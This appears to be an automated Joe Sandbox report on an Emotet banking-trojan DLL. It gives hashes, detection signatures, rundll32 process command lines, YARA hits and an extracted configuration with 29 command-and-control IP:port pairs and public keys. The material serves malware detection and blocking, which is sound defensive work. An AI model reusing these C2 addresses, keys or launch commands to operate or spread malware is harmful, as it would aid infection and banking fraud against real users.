Play interactive tour

Edit tour

Windows Analysis Report 6zAcNlJXo7.dll

Overview

General Information

Sample Name:	6zAcNlJXo7.dll
Analysis ID:	532221
MD5:	c7e23f2764d6ed9b59b0fed69a4488b0
SHA1:	67f31b13485f91be7952b3df5628f14ef1c86a38
SHA256:	d048f196a39fc7dae500b057fa000ebbb81ae2e6c18b4ddff445e8d7163f20ab
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Abnormal high CPU Usage

AV process strings found (often used to terminate AV products)

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Connects to several IPs in different countries

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4668 cmdline: loaddll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6172 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6176 cmdline: rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6324 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6404 cmdline: rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6312 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zsdkqzebleakbz\gnpornwqabjsi.vaq",YawfQDI MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6996 cmdline: rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,axamexdrqyrgb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6300 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4248 cmdline: rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,bhramccfbdd MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5344 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5544 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 3860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 324 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 4884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5644 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 3160 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4668 -ip 4668 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 4820 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.598946349.000000000072A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.596768757.0000000000A60000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.615675303.0000000000B8C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000003.557368858.0000000002D65000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.595689976.000000000060A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.597386823.00000000008E0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.643045864.0000000000B8C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.597549993.0000000000B8C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.613993965.0000000000A60000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.615392489.0000000000A60000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.598782764.00000000003C0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.597443170.0000000000A60000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.599282857.0000000002D2A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.699398284.0000000002CCA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.596835233.0000000000B8C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.614123815.0000000000B8C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.595650059.0000000000510000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author
0.0.loaddll32.exe.a60000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a60000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b93b30.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.622160.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.2ce22d0.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a60000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b93b30.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a60000.3.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.2ce22d0.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b93b30.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.b93b30.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.742148.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3c0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.622160.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.970000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.a60000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b93b30.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.8e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b93b30.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.742148.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.510000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b93b30.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3c0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.510000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.8e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.970000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a60000.9.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.2d44168.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.2d44168.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a60000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.a60000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a60000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b93b30.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b93b30.7.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.b93b30.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a60000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 31 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.2d44168.1.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 6zAcNlJXo7.dll	Virustotal: Detection: 23%			Perma Link
Source: 6zAcNlJXo7.dll	ReversingLabs: Detection: 24%

Source: 6zAcNlJXo7.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: 6zAcNlJXo7.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.602824148.00000000049DE000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.602932789.000000000328A000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.619910392.00000000031BC000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.620547498.00000000031BC000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.611725686.0000000000912000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.619910392.00000000031BC000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.620547498.00000000031BC000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EAA2FE7 FindFirstFileExW,		0_2_6EAA2FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EAA2FE7 FindFirstFileExW,		2_2_6EAA2FE7

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 104.245.52.73:8080
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 103.8.26.103:8080
Source: Malware configuration extractor	IPs: 185.184.25.237:8080
Source: Malware configuration extractor	IPs: 103.8.26.102:8080
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 51.68.175.8:8080
Source: Malware configuration extractor	IPs: 210.57.217.132:8080

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: Joe Sandbox View	IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View	IP Address: 212.237.17.99 212.237.17.99

Source: unknown

Network traffic detected: IP country count 19

Source: svchost.exe, 00000008.00000003.547746216.00000162642A0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.557044428.00000162642A0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.700137823.00000162642A1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.640644218.0000000004F84000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.640563575.0000000004F70000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.642313149.0000000004F85000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000008.00000003.547746216.00000162642A0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.557044428.00000162642A0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.700137823.00000162642A1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: Amcache.hve.17.dr	String found in binary or memory: http://upx.sf.net

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0.0.loaddll32.exe.a60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.622160.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2ce22d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2ce22d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.b93b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.742148.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.622160.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.742148.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.8e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2d44168.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2d44168.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b93b30.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.b93b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.598946349.000000000072A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.596768757.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.615675303.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.557368858.0000000002D65000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595689976.000000000060A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.597386823.00000000008E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.643045864.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.597549993.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.613993965.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.615392489.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.598782764.00000000003C0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.597443170.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.599282857.0000000002D2A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.699398284.0000000002CCA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.596835233.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.614123815.0000000000B8C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595650059.0000000000510000.00000040.00000010.sdmp, type: MEMORY

Source: 6zAcNlJXo7.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Zsdkqzebleakbz\gnpornwqabjsi.vaq:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Zsdkqzebleakbz\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A7ED95	0_2_00A7ED95
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A704A4	0_2_00A704A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6F4A5	0_2_00A6F4A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A668AD	0_2_00A668AD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A756A9	0_2_00A756A9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A73ABE	0_2_00A73ABE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A7B0BA	0_2_00A7B0BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6AEB9	0_2_00A6AEB9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A63085	0_2_00A63085
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6C69B	0_2_00A6C69B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6F699	0_2_00A6F699
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6D899	0_2_00A6D899
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A806EF	0_2_00A806EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6A8E8	0_2_00A6A8E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A820F8	0_2_00A820F8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6BEF5	0_2_00A6BEF5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6E6FD	0_2_00A6E6FD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A654C0	0_2_00A654C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A77EDD	0_2_00A77EDD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A80AD3	0_2_00A80AD3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A70824	0_2_00A70824
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A70A37	0_2_00A70A37
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A7CC3F	0_2_00A7CC3F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A63E3B	0_2_00A63E3B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6F20D	0_2_00A6F20D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A71C12	0_2_00A71C12
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A82C16	0_2_00A82C16
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A7BA18	0_2_00A7BA18
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A80C66	0_2_00A80C66
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A81C71	0_2_00A81C71
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A7E478	0_2_00A7E478
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A7604E	0_2_00A7604E
